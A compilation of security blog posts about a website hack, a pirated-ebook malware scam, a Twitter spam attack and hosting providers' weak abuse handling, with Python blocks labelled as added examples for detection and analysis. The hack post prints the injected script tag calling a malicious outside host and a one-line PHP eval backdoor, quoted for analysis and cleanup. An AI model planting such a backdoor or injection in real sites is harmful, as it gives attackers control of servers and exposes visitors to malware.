So Cloudflare, which was founded with the goal of stopping spammers by three anti-spam activists, is now a one-stop, bulletproof supplier for spam and malware services.


The problem

Cloudflare, whether by accident or by design, has a broken internal process for dealing with spam and abuse complaints. Spamcop–a large anti-spam website that processes spam emails, tracks the responsible mail and Web hosts and notifies them of the spam–will no longer communicate with Cloudflare, because Cloudflare does not pay attention to email reports of abuse even though it has a dedicated abuse email address (that address is often unworkable, as Cloudflare has in the past enabled spam filtering on it, meaning spam complaints get deleted as spam).

Large numbers of organized spam gangs sign up for Cloudflare services. I track all the spam that comes into my mailbox, and I see so much spam that’s served by Cloudflare I keep a special mailbox for it.

Right now, about 15% of all the spam I receive is protected by Cloudflare. Repeated complaints to their abuse team, either to their abuse email address or on their abuse Web form, generally have no effect. As I’ve documented here, Cloudflare will continue to provide services for spam, malware, and phish sites even long after the Web host that’s responsible for them has taken them down; they kept providing services for the malware domain rolledwil.biz, being used as part of a large-scale malware attack against Android devices, for months after being notified.

One of the spam emails in my Cloudflare inbox dates back to November of 2013. The spamvertised domain, is.ss47.shsend.com, is still active, nearly a year after Cloudflare was notified of the spam. A PayPal phish I reported to CloudFlare in March of 2014 was finally removed from their content delivery network three months later…after some snarky Twitter messages from Cloudflare’s security team.

(They never did put up the interstitial warning, and continued to serve the PayPal phish page for another month or more.)

Cloudflare also continues to provide services for sites like masszip.com, the Web site that advertises pirated eBooks but actually serves up malware.

In fact, I’ve been corresponding with a US copyright attorney about the masszip.com piracy, and he tells me that Cloudflare claims immunity from US copyright law. They claim that people using the Cloudflare CDN aren’t really their concern; they’re not hosting the illegal content, they’re just making a copy of it and then distributing it, you see. Or, err, something.

I am not sure what happened within Cloudflare to make them so reluctant to terminate their users even in cases of egregious abuse, such as penis-pill spam, piracy, and malware distribution. From everything I can find, it was started by people genuinely dedicated to protecting the Internet from spam and malware, but somehow, somewhere along the way, they dropped the ball.

I wonder if Michelle Zatlyn is still proud.

More Than Two hack

As most of you know, I do computer security as a hobby. (Browse the Computer Security and Computer Viruses tags on this blog to see what I mean.) So it was with a measure of embarrassment that I discovered, while at Atlanta Poly Weekend in June, that the More Than Two Web site had been hacked.

I first became aware there was a problem when Eve visited the site on her phone and saw this:

I investigated and discovered that malicious code had been added to the bottom of each page, just below the closing body tag. The following code had been injected:

<noindex>
<script src="http://stat.rolledwil.biz/stat.php?1921853954">
</script>
</noindex>

I spent the next few hours not going to panels or workshops, but instead looking at logs, talking to my hosting provider, and investigating the source of the attack. Fortunately, an old friend of mine from Atlanta who does computer security professionally happened to be at the convention, and I spent some time talking to him, too.

A malicious file that offered people a back door into the site had been added, and files had been tampered with to inject the hostile code into HTML pages.

I quickly discovered the attack was targeted only at Android browsers, and only certain versions of Android (as near as I can tell, versions equal to or less than 4.0).

The site at stat.rolledwil.biz returned a 404 Not Found whenever I tried to visit it directly. In addition, non-Android mobile browsers and desktop browsers didn’t return the error.

I removed the malicious files and the hack, and then set about figuring out what had happened and what its purpose was. What I found was interesting.


The malicious site at stat.rolledwil.biz was served by Cloudflare, the spam and malware sewer that figures prominently in problems I’ve written about here and here. I emailed Cloudflare, and received a terse reply that the actual host was an outfit called Digital Ocean. I emailed them, and they quickly shut down the malware server.

The number that appears after the question mark in the line

<script src="http://stat.rolledwil.biz/stat.php?1921853954">

is an encoded version of the IP address of the More Than Two server. The first thing this script does is check the browser's referrer (the Referer header) against this encoded IP address. If they don't match, it returns a 404. Basically, it looks to see if the script is being called from a hacked Web site. If it isn't, then it's probably a security researcher trying to figure out what the script does, so it sends back a 404.

The next thing it does is look at the browser's user agent–the string that tells a Web site what kind of browser you're using. If it isn't Android, it also returns a 404. The flow looks like this:

So only if the call appears to be coming from an Android browser visiting a hacked Web site does the malicious script get served up. The script produces the alert dialog shown above, and tries to redirect to a URL in Eastern Europe (not functioning at the time I observed this).
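The two-stage gate above is what makes a cloaked malware script so hard to pull for analysis. The following Python model is an added example, not the original post's code and not the script that ran on stat.rolledwil.biz: it implements the same referrer-then-user-agent decision and shows the request headers an analyst sets to satisfy both checks. Its assumptions are labelled in the code: the number after the question mark is treated as an IPv4 address written as a single 32-bit integer (under that rule 1921853954 would read as 114.141.42.2; the real encoding is not known from the post), the host name hacked.example and its address are made up and resolved through a lookup table rather than DNS, and the Android 4.0 cutoff is the one observed above.

```python
"""Model of a referrer/user-agent cloaking gate like the one described above.

Added illustration: not the real stat.php.  Assumptions (labelled): the query
number is an IPv4 address in 32-bit-integer form, hosts resolve through an
injected lookup table, and Android <= 4.0 is the targeted range.
"""
import re
from ipaddress import IPv4Address
from typing import Callable, Optional, Tuple
from urllib.parse import urlsplit

ANDROID_RE = re.compile(r"Android[ /](\d+)(?:\.(\d+))?")
MAX_ANDROID = (4, 0)                     # cutoff observed in the post
# Placeholder body: the real alert text and redirect target are not reproduced.
PAYLOAD = "alert('...'); location.href='http://redirect.example/';"

# Sample user agents (constructed; the first follows the old Android stock browser format).
OLD_ANDROID_UA = ("Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; GT-I9100 Build/IML74K) "
                  "AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30")
NEW_ANDROID_UA = ("Mozilla/5.0 (Linux; Android 4.4.2; Nexus 5 Build/KOT49H) "
                  "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0 Mobile Safari/537.36")
DESKTOP_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0"


def decode_ip(token: str) -> str:
    """ASSUMPTION: the token is an IPv4 address written as a single 32-bit integer."""
    return str(IPv4Address(int(token)))


def android_version(user_agent: str) -> Optional[Tuple[int, int]]:
    """(major, minor) parsed from an Android UA string, or None if it isn't Android."""
    m = ANDROID_RE.search(user_agent)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2) or 0)


def gate(query: str, referer: Optional[str], user_agent: str,
         resolve: Callable[[str], Optional[str]]) -> Tuple[int, str]:
    """What a cloaking stat.php returns for one request: (status, body)."""
    if not referer:
        return 404, ""                       # direct visit: probably an analyst
    host = urlsplit(referer).hostname
    if host is None or resolve(host) != decode_ip(query):
        return 404, ""                       # Referer isn't the hacked site
    ver = android_version(user_agent)
    if ver is None or ver > MAX_ANDROID:
        return 404, ""                       # not a targeted Android browser
    return 200, PAYLOAD


def probe_headers(hacked_page_url: str) -> dict:
    """Headers an analyst sets to satisfy both checks when fetching the script."""
    return {"Referer": hacked_page_url, "User-Agent": OLD_ANDROID_UA}


# Constructed lookup table standing in for DNS; hacked.example is made up.
DEMO_RESOLVER = {"hacked.example": decode_ip("1921853954")}.get


def demo() -> dict:
    """Run the gate against the request shapes the post distinguishes."""
    q, ref = "1921853954", "http://hacked.example/some-page/"
    probe = probe_headers(ref)
    return {
        "direct_visit": gate(q, None, DESKTOP_UA, DEMO_RESOLVER)[0],
        "desktop_from_hacked_site": gate(q, ref, DESKTOP_UA, DEMO_RESOLVER)[0],
        "new_android_from_hacked_site": gate(q, ref, NEW_ANDROID_UA, DEMO_RESOLVER)[0],
        "old_android_from_hacked_site": gate(q, ref, OLD_ANDROID_UA, DEMO_RESOLVER)[0],
        "analyst_probe": gate(q, probe["Referer"], probe["User-Agent"], DEMO_RESOLVER)[0],
    }


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name:32s} -> {status}")
```

The practical lesson is in `probe_headers`: a bare `curl` or browser visit to such a URL proves nothing, because a 404 is exactly what the gate hands to anyone who isn't arriving from the compromised page on an old Android build. Set both headers (and, if the gate also keys on the query token, keep it intact) before concluding a script is dead.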

The initial attack vector seems to be a variant of the Mayhem worm targeting Web servers. My Web hosting company was apparently vulnerable (the problem has since been fixed), and the exploit was used to drop a malicious PHP file on my server. The PHP file looked like this:

<?php @eval(stripslashes($_REQUEST[ev]));

If you know PHP, you're probably filled with a sinking feeling of horror and dread looking at that. Basically, it lets anyone who knows the parameter name run arbitrary PHP code on the Web server simply by sending it in a request from a browser.

From here, the attackers modified the files on the Web server to inject the malicious HTML into Web pages.
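When cleaning up after an intrusion like this one, the two things to sweep the whole web root for are the dropped backdoor and every page that carries the injected tag. The scanner below is an added example, not the tooling the author used: it flags PHP files that pass a request superglobal straight into eval() or assert() (the one-liner quoted above is its model) and HTML or PHP files that load a remote script after the closing body tag. The sample web root it scans is constructed in a temporary directory; the wp-content and wp-includes paths are illustrative names, not the real site's layout, and the signatures are deliberately narrow (a base64-obfuscated backdoor would not match the first one).

```python
"""Sweep a web root for the two artefacts described above.

Added example, not the author's tooling: finds PHP files that eval()
request-supplied data (the one-line backdoor quoted above) and HTML/PHP
files with a <script src=...> injected after the closing </body> tag.  The
sample web root below is constructed; its paths are illustrative only.
"""
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

Finding = Tuple[str, str, str]          # (kind, relative path, evidence)

PHP_EXTS = {".php", ".phtml", ".inc"}
HTML_EXTS = {".html", ".htm", ".php", ".phtml"}

# eval()/assert() fed straight from a request superglobal, optionally through
# stripslashes(), e.g.  @eval(stripslashes($_REQUEST[ev]));
PHP_BACKDOOR_RE = re.compile(
    r"\b(?:eval|assert)\s*\(\s*(?:stripslashes\s*\(\s*)?"
    r"\$_(?:REQUEST|GET|POST|COOKIE)\b",
    re.IGNORECASE,
)
# A remote script loaded anywhere after </body>; legitimate pages keep scripts inside it.
TRAILING_SCRIPT_RE = re.compile(
    r"</body>.*?<script[^>]*\bsrc\s*=\s*[\"']?(?P<src>[^\"'\s>]+)",
    re.IGNORECASE | re.DOTALL,
)


def scan_file(path: Path, root: Path) -> List[Finding]:
    """Apply both signatures to one file and return every hit."""
    findings: List[Finding] = []
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return findings
    rel = path.relative_to(root).as_posix()
    suffix = path.suffix.lower()
    if suffix in PHP_EXTS:
        for m in PHP_BACKDOOR_RE.finditer(text):
            findings.append(("php-eval-backdoor", rel, m.group(0)))
    if suffix in HTML_EXTS:
        for m in TRAILING_SCRIPT_RE.finditer(text):
            findings.append(("script-after-body", rel, m.group("src")))
    return findings


def scan_tree(root) -> List[Finding]:
    """Walk a web root and collect findings from every regular file."""
    root = Path(root)
    out: List[Finding] = []
    for p in sorted(root.rglob("*")):
        if p.is_file():
            out.extend(scan_file(p, root))
    return out


# Constructed sample web root: one injected page, one clean page, one dropped
# backdoor, one ordinary PHP file.  The injected page mirrors the tag quoted above.
SAMPLE_TREE = {
    "index.html": (
        "<html><body><p>hello</p></body>\n<noindex>\n"
        '<script src="http://stat.rolledwil.biz/stat.php?1921853954">\n'
        "</script>\n</noindex>\n"
    ),
    "about.html": '<html><body><p>clean</p><script src="/js/app.js"></script></body></html>\n',
    "wp-content/uploads/cache.php": "<?php @eval(stripslashes($_REQUEST[ev]));\n",
    "wp-includes/functions.php": "<?php function add_filter($a, $b) { return true; }\n",
}


def build_sample_tree(root) -> None:
    for rel, content in SAMPLE_TREE.items():
        p = Path(root) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)


def demo() -> List[Finding]:
    """Build the sample tree, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for kind, rel, evidence in demo():
        print(f"{kind:20s} {rel:32s} {evidence}")
```

Run it as `python scan.py /path/to/webroot` after swapping `demo()` for `scan_tree(sys.argv[1])`; on a real site, compare the hit list against a clean copy of the CMS (a file under an uploads directory that contains PHP at all is suspicious on its own) and treat every injected page as evidence that file permissions, not just content, need reviewing.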

The server has been fixed, the CMS I use has been updated, and I've taken other steps to guard against a repeat attack. The attack vector was closed the day after I discovered it, but I held off writing about the attack until I had finished analyzing it and had a good understanding of exactly what happened and how it worked.

The fact this attack was as sophisticated as it was and was aimed, not at Windows, but at Android, is interesting.


There’s a postscript to this. The malicious attack site was served up by Cloudflare, the content distribution network with a reckless disregard for security and abuse. I notified the actual Web host, Digital Ocean, about the attack, and they had disabled the site by June 11.

However, a month after being told the site was serving malware and being used as part of a Web attack, and almost a month after the site had been disabled, Cloudflare was still trying to serve its content:

Cloudflare appears indifferent to even the most egregious abuse, and will continue to provide services to abusive Web sites long after they’re notified of the abuse, and even long after the sites’ hosts have shut them down. I’m not quite sure what to make of that, but I’m becoming more and more convinced Cloudflare is a menace to the Internet.

Piracy and More Than Two: Caveat Emptor

This Blog post has been updated; updates are at the end.

Recently, a concerned blog reader sent me an email alerting me to a Web site that claimed to have a free ebook download for More Than Two, the polyamory book Eve and I just finished. He found the link on a YouTube “video” that was basically just a still spam image claiming that the book could be downloaded free, with a Web link in the description. The YouTube page looks like this:

Naturally, I was concerned; Eve and I have put a tremendous amount of work into the book. The eBook isn’t slated to be released until September 2; only our Indiegogo backers have a copy of it, so if it’s leaked, it came from one of our backers.

The download site is a place called masszip.com. It claims to have a huge number of “free” ebooks available for download, all of them pirated versions of books that are most definitely not free.

On the masszip.com page for More Than Two, there is a prominent “Download Now” button. Clicking it causes a “Premium Content” popup to appear:

The popup has several links for various online "surveys" and advertising offers. If you click on one of them, you are taken to another site called cleanfiles.net, which then redirects through a number of affiliate-tracking intermediaries to one of the sites offering "free*" (*participation required) gift cards, surveys, and the other sorts of flim-flam that fill the scummy and less reputable corners of the Internet.

Both masszip.com and cleanfiles.net are served up by the Cloudflare content delivery network. I’m planning an entire computer security blog post about Cloudflare; they are either completely incompetent or totally black hat, and provide content delivery services for a wide assortment of spammers, malware distributors, and phish pages. (I’ve mentioned Cloudflare’s dysfunctional abuse procedures in a previous blog post.)

I jumped through all the hoops to download a copy of More Than Two, using a disposable email address created just for the purpose. The sites signal cleanfiles.net that you’ve finished the “survey” or filled in an email for an insurance quote or whatever, and then a file downloads.

It’s not necessarily the file you expected, though.

The first time I did this, I got a file that claimed to be an epub, all right, but it wasn’t More Than Two. It was a file called Ebook+ID+53170.rar, which uncompressed into a file called “Words of Radiance – Brandon Sanderson.epub”. Words of Radiance looks to be a real book–a somewhat pedestrian fantasy story about kings and assassins and heroes with secret powers.

The file was not actually an ebook, though. It was actually a Windows executable; and, needless to say, I would not recommend running it. In my experience, Windows executable files that mislead you about their names usually have nefarious purposes.
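A file's extension is whatever the person who packed it chose; the first few bytes are much harder to lie about. The checker below is an added example, not from the post: it classifies a download from its magic bytes (the MZ stub and PE signature of a Windows executable, the RAR marker, and a ZIP container that is only an EPUB if its `mimetype` entry says so) and reports when the bytes are executable but the name claims otherwise. The sample byte strings are constructed stand-ins for the post's .rar and fake .epub, not the real files.

```python
"""Identify a download by content, not by name.

Added example, not from the post.  The post's download was a .rar holding a
"...epub" that was really a Windows executable; the byte strings built here
are constructed stand-ins for that, not the real files.
"""
import io
import struct
import zipfile

EXECUTABLE_EXTS = {"exe", "dll", "scr", "com", "pif"}


def classify(data: bytes) -> str:
    """Return 'pe', 'mz', 'epub', 'zip', 'rar' or 'unknown' from magic bytes alone."""
    if data[:2] == b"MZ":                     # DOS/Windows executable stub
        if len(data) >= 0x40:
            pe_off = struct.unpack_from("<I", data, 0x3C)[0]   # e_lfanew
            if data[pe_off:pe_off + 4] == b"PE\0\0":
                return "pe"                   # modern Windows PE image
        return "mz"                           # MZ header without PE: still not an ebook
    if data.startswith(b"Rar!\x1a\x07\x00") or data.startswith(b"Rar!\x1a\x07\x01\x00"):
        return "rar"                          # RAR v4 / v5 archive markers
    if data[:4] == b"PK\x03\x04":             # ZIP container (EPUB is a ZIP)
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                if ("mimetype" in zf.namelist()
                        and zf.read("mimetype").strip() == b"application/epub+zip"):
                    return "epub"
        except zipfile.BadZipFile:
            return "unknown"
        return "zip"
    return "unknown"


def is_disguised_executable(filename: str, data: bytes) -> bool:
    """True when the bytes are an executable but the file name says otherwise."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return classify(data) in {"pe", "mz"} and ext not in EXECUTABLE_EXTS


def check_download(filename: str, data: bytes) -> str:
    """One-line verdict for a downloaded file."""
    kind = classify(data)
    if is_disguised_executable(filename, data):
        return f"{filename}: {kind} executable disguised by its name - do not run"
    return f"{filename}: {kind}"


# --- constructed samples --------------------------------------------------
# Minimal PE skeleton: MZ stub, e_lfanew at 0x3C pointing at a "PE\0\0" signature.
FAKE_PE = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0" + b"\0" * 20
FAKE_RAR = b"Rar!\x1a\x07\x00" + b"\0" * 16


def make_epub() -> bytes:
    """Smallest thing that classifies as EPUB: a ZIP whose first entry is the mimetype."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(zipfile.ZipInfo("mimetype"), b"application/epub+zip",
                    compress_type=zipfile.ZIP_STORED)
        zf.writestr("META-INF/container.xml", "<container/>")
    return buf.getvalue()


if __name__ == "__main__":
    print(check_download("Words of Radiance - Brandon Sanderson.epub", FAKE_PE))
    print(check_download("Ebook+ID+53170.rar", FAKE_RAR))
    print(check_download("More Than Two.epub", make_epub()))
```

On a real download, read the first few kilobytes with `open(path, "rb")` and pass them to `check_download`; the same approach (`file` on Unix does it with a far larger signature table) catches the common trick of a double extension such as `.epub.exe` hidden by a file manager that suppresses known extensions.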

I tried the download again, using a different “survey” link and a different throwaway profile, and ended up being taken to this page:

I’m betting the violation of the Mediafire terms of service probably related to malware.

So basically, the site offers pirated eBooks, but actually makes you fill out surveys and apply for various kinds of insurance quotes and so on, presumably all to make money for the folks who run it. It doesn’t actually deliver the goods, however. Instead, it delivers Windows executables of undetermined provenance that likely don’t do anything you want them to do.

I examined each of the links and discovered the owners of the site are using three different affiliate tracking systems to make money. The affiliate system you’re routed through depends on which link you click. The system looks something like this:

Presumably, they also make money from malicious file downloads.

The site at trk.bluetrackmedia.com is an affiliate tracking site run by Blue Track Media, which bills itself as “The Performance-Based Online Advertising Company.” Typical URLs that run through Blue Track Media look like

http://trk.bluetrackmedia.com/cclick.php?affiliate=3239&campaign=9600&sid=139267348_21118_w_161238&sid3=2859

The people responsible for this scam are identified by the affiliate code “affiliate=3239”.

The site at adworkmedia.com is an affiliate tracking site run by AdWorkMedia, a site that monetizes Web sites using “content locking,” where certain parts of the site are blocked until the visitor does something like fills out a Web survey or gives his email address to an advertiser. Typical URLs that run through AdWorkMedia look like

http://www.adworkmedia.com/go.php?camp=7012&pub=11178&id=15672&sid=&sid2=2736&sid3=LinkLocker&ref=&shortID=198717

t.afftrackr.com is a site registered to a guy named Ryan Schulke. It’s listed as malicious by VirusTotal.

I can’t find out much about quicktrkr.com, except that it’s a new site registered February of this year, 1.quicktrkr.com is hosted on Amazon EC2, and it’s protected by a whois anonymizing service in Panama.

So in short, here’s the scam:

A Web site, masszip.com, promises free stolen eBooks. The site is a front-end for another site, cleanfiles.net, which makes money by using an affiliate system to try to get you to fill out surveys and similar offers. Advertising companies like AdWorkMedia and Blue Track Media pay the site owners whenever you fill out one of these surveys or offers.

If you do this, a file downloads to your system. It will claim to be an eBook (though not the eBook you thought you were getting), but analysis of the file shows it's actually a Windows executable. The scam is spamvertised via YouTube "videos" that are actually nothing but spam front-ends.

If you’re looking for a copy of our book More Than Two, I suggest you don’t take this route. I understand that waiting for the book to be released on September 2nd might feel like agony (believe me, it does for us too!), but it’s a lot less likely to get your computer infected with malware, and it won’t help line the pockets of scammers at your expense.

Interestingly, some of the advertised sites you end up with if you jump through all the hoops are actually mainstream, big-name companies like Allstate and Publisher’s Clearinghouse, which apparently have no compunction in associating their brands with scams and malware.

UPDATE: The site at t.afftrackr.com appears to be owned by Cake Marketing, and is part of their affiliate tracking system. A Google search for t.afftrackr.com shows a very low confidence in the site, and a number of complaints and dodgy associations.

UPDATE 2 (1-July-2014): The YouTube account of the scammer has been terminated. I received an email this morning from Blue Track Media, saying the affiliate account of the scammers had been closed.

The scam is still active, and it’s now using the affiliate tracking company Adscend Media. Typical URLs used in the links on the scam download page look like

http://adscendmedia.com/click.php?aff=12842&camp=29168&crt=0&prod=3&from=1&sub1=141558590_21118_w_161238&subsrc=2859

I also filed a DMCA report with Cloudflare, and received a reply that basically says “we are a content delivery network, not a conventional Web host, so we don’t have to listen to DMCA reports.” Cloudflare is continuing to provide services to the scam Web sites.

UPDATE 3 (1-July-2014): Only a few hours after I emailed Adscend Media about the scam, I received an email saying they’d also terminated the scammer’s affiliate account.

UPDATE 4 (26-July-2014): I’ve received an email from a person who claims to be working for the Web site masszip.com.

From: Luella Forbes
To: [my franklinveaux dot com address]
Subject: RE: Your book has been taken down
Date: Fri, 25 Jul 2014 04:22:07 +0100

Hello Im Kathyne PAce

I am from masszip.com

i removed your book from our site http://www.masszip.com/two-practical-guide-ethical-polyamory-franklin-veaux-

Now now it does not exist on our site . Sorry for this.

I have removed your books on the web masszip
so you also please remove your post says about us here http://blog.franklinveaux.com/2014/06/piracy-and-more-than-two-caveat-emptor/

Thanks u !

Apparently, they don’t like blog posts saying they’re claiming to give away bootlegged books for free but in fact are distributing Windows executables.

UPDATE 5 (27-July-2014): I’ve received another email from the person who claims to be behind the site, apparently upset I haven’t taken down this post:

From: Luella Forbes
To: [my franklinveaux dot com address]
Subject: Franklin is gay!
Date: Sun, 27 Jul 2014 23:16:54 +0100

Franklin is gay ,ok update it on your blog now . U are lady ,that is true

I wonder if I should give this person’s email address to the publishers of all the books the Web site claims to have available for free download.

UPDATE 6 (14-August-2014): The page is back on Masszip advertising More Than Two. As before, it doesn’t actually lead to a download of the eBook; instead, if you jump through the affiliate marketing hoops to get it, you end up with a Windows executable disguised as an eBook.

Also, the Masszip folks are back to using the Blue Track Media affiliate link. I’ve emailed Blue Track Media about it.

Large-scale hack attack against Twitter?

I woke up late this morning, had breakfast, made some tea, checked my Twitter feed (as one does), and in amongst all the pictures of cats, half-naked selfies, BDSM porn, and links to articles about neurophysiology and evolutionary biology that make up my Twitter feed, I noticed something very odd. About 15% of my Twitter followers were posting things that look like this:

And imagine my surprise when one of the accounts posting these types of messages belonged to me; namely, my Promiscuity Keepers Twitter feed, where I post links to articles about sex and sexuality.

So it appears there's a pretty large attack going on against Twitter right now. I am not sure if the attack is simply a brute-force hack against account passwords, or if the hackers have somehow penetrated Twitter itself and made off with lists of accounts and (hashed? hashed and salted? exposed?) passwords. Because of the suddenness and number of accounts compromised, my gut says it might be an attack on Twitter's servers directly, rather than a brute-force attack against individual accounts. (The password I use is, of course, a long string of letters and numbers, rather than, say, the word "password" or "secret" or the other hideously insecure passwords people often use.)

I logged in to my Twitter account (after some faffing with Twitter’s “forgot my password” link) and discovered something interesting: The hackers are authorizing malicious Twitter apps with read/write access, presumably to mass-broadcast spam to many Twitter accounts at once.

Resetting a password on a hacked account without revoking access to these malicious apps will allow the hackers to retain control of the account. It’s possible the hackers are using these malicious apps to gain control of the hacked accounts directly, by forging permission to allow the account to authorize the apps.

In any event, the Spamvertised links all point to a Web site hosted by a German Web hosting firm called plusserver.de. It’s a Russian-language file-sharing site, and each of the Spamvertised links claims to be a driver package for some model of computer.

Naturally, I downloaded one of these files, then uploaded it to Virustotal for analysis. And, unsurprisingly, it’s malware:

InstallMonster is a malware package designed to cheat online advertisers out of money for the virus writers. Whenever a user of an infected computer clicks on certain Web links, the malware changes the link in such a way as to make it seem like the click came from a revenue sharing, advertising, or affiliate marketing site, and the malware writer receives a small commission for the click.

The malware is sold openly from a Russian-language site called getfile.eu, hosted by a Web hosting outfit in Cyprus called hostzealot.com.

So to recap: Attackers are gaining access to large numbers of Twitter accounts and using them to spam malware. The malware is an off-the-shelf package designed to allow its users to profit from click fraud; the malware authors operate a site hosted on hostzealot.com. The compromised Twitter accounts have read/write access granted by malicious Twitter apps. They’re being used to spread links to the InstallMonster malware, probably not from the malware’s actual authors, but from people who’ve bought a copy of InstallMonster and customized it to direct money to them. (That’s increasingly the way the malware industry works: people create turnkey malware kits which they then sell to other criminals.)

IF YOUR TWITTER ACCOUNT IS HACKED: It’s not enough just to change your password! You must also go to your Apps control panel in your profile and revoke access to the malicious apps!

GoDaddy, malware, and an ISP’s fall from grace

Some time ago, I posted about a malware attack hitting a large number of sites all across the globe, in which hacked Web sites were subverted into distributing a Windows-based bit of malware called W32/Kuluoz, which attempts to steal banking, PayPal, eBay, FTP, and other passwords from your computer.

In that post, I charted the ISPs hosting the most malware-infected sites, and noted that US ISP GoDaddy was, by far, hosting the most active malware droppers.

I used to be a GoDaddy customer. I hosted many Web sites on their servers, some of them for eleven years, and I recommended them to my clients as well. A couple of years back, I started pulling my sites off GoDaddy and recommending that my clients do the same because they began experiencing severe performance issues affecting their shared hosting database servers.

In all the time I have hosted with them in the past, though, the one thing I’ve really liked about them was their abuse team. At the time, it was one of the swiftest, most savvy, most responsive abuse and security teams of any major ISP on the market.

Those days appear to be gone.


The post I linked to above was written in April. Right now, as I type this, many of the malware droppers I saw back then on GoDaddy's servers are, unbelievably, still active.

GoDaddy, in the span of just a couple of years, seems to have gone from being one of the top anti-abuse ISPs to being one of the worst. I have, quite literally, seen tiny ISPs in normally spam- and malware-friendly havens like Romania deal with security and abuse issues better.

On one level, it might be assumed that large ISPs are just getting worse about security and abuse issues in general. After all, an ISP's abuse and security team are paid to reduce the company's revenue, something that's hard to stomach in a world where hosting providers are becoming part of Wall Street, particularly in an economic downturn.

Or it could be a statistical fluke. As ISPs host more sites, the number of sites with security problems might naturally be expected to increase.

But neither of those ideas seems to explain GoDaddy's problems. Other ISPs, even large ISPs which have in the past had serious security problems of their own (Dreamhost, for example), are actually getting better–more responsive, more secure, faster to take down malware-infected sites.

Nearly all the ISPs I have seen be targeted by the Kuluoz malware attacks have grown better at detecting them and better at shutting down compromised sites quickly.

Nearly all, that is, except GoDaddy.


It’s hard to say what’s happening inside GoDaddy. What’s happening from the outside, however, is plain. Its abuse team does not respond to malware and security reports. Reported malware sites stay active for months. There’s a site I first reported to GoDaddy in November that was only finally fixed in May, and I’m not sure it was GoDaddy’s doing; the site owner may have secured the site himself. Repeated complaints to GoDaddy’s abuse team, in email and using their abuse Web form, produce few or no results.

Meanwhile, the entire Internet suffers. GoDaddy customers have their sites compromised and taken over by organized crime. Web surfers get directed to malware droppers hosted by GoDaddy. GoDaddy appears to be aware of the situation, at least if they monitor their Web forms and abuse address (something which has not been conclusively demonstrated, I’ll admit), and chooses not to act.

For a short time, GoDaddy’s Twitter team was responsive to these problems. When I started tweeting about GoDaddy-hosted malware droppers which had been active on their servers for months, I would receive responses like this:

I was briefly hopeful, but the infected sites remained active, still spreading the Kuluoz malware.

It’s hard to understand why, as many ISPs move in the direction of being responsive and security-conscious, GoDaddy is moving in the opposite direction.

At the moment, as I type this blog post, I am aware of many malware droppers on GoDaddy's servers, many of which have been active for four months or more, including malware droppers on sites like www.buysynthetic.com and www.wiredprojects.com which GoDaddy has been notified of multiple times and which continue to remain active.

At this point, it appears the best course of action is to avoid GoDaddy and to advise others to do the same. I no longer recommend GoDaddy to my clients, and I’ve pulled my own sites off their servers. I am also transferring my domains away from GoDaddy as they come up for renewal.

It’s disappointing to see a large company that was once so responsive to abuse and security issues sink to the point where they’re now worse in that regard than ISPs in Romania and Kazakhstan.

There is a saying in the anti-spam community: the normal course of business of a spam-supporting ISP is to go out of business. It will be interesting to see if GoDaddy follows this course, or if they are able to change direction before their inability to act against compromised sites costs them significantly.


UPDATE: Two days after posting this, I received the following email from GoDaddy:

Dear Franklin

Thank you for sharing your feedback with us.

Please rest assured that GoDaddy takes security and malware issues seriously. We have fully investigated your concerns and at this time all reported malware has been removed. We encourage CMS users to follow best practices, keeping core and secondary components such as plug-ins and extensions up to date. We welcome any additional feedback you wish to share in reply.

Thank you for your time and as always, thank you for being a GoDaddy customer.

John M.
Office of the CEO, GoDaddy
14455. N. Hayden Rd. Suite 226
Scottsdale, AZ 85260
CEOTeam@GoDaddy.com
480-505-8828

I’ve checked the emails I’ve sent them, and sure enough, all the malware droppers are gone.

Evolution of the W32/Kuluoz malware scam

Well, boys and girls, it looks like the malware distribution I talked about here and here has morphed again. This morning, I started receiving emails that pretend to be DHL delivery notifications, rather than American Airlines ticket sales or FedEx notifications:

As before, the links take you to hacked WordPress or Joomla sites that will examine your browser user-agent. If you’re on a Mac or Linux computer, or you’re using a modern Windows browser, you’ll see a phony 404 Not Found error that looks like this:

If you’re using a Windows browser that has vulnerabilities, the link will download a copy of the W32/Kuluoz information and bank password stealing malware.

Stay safe out there.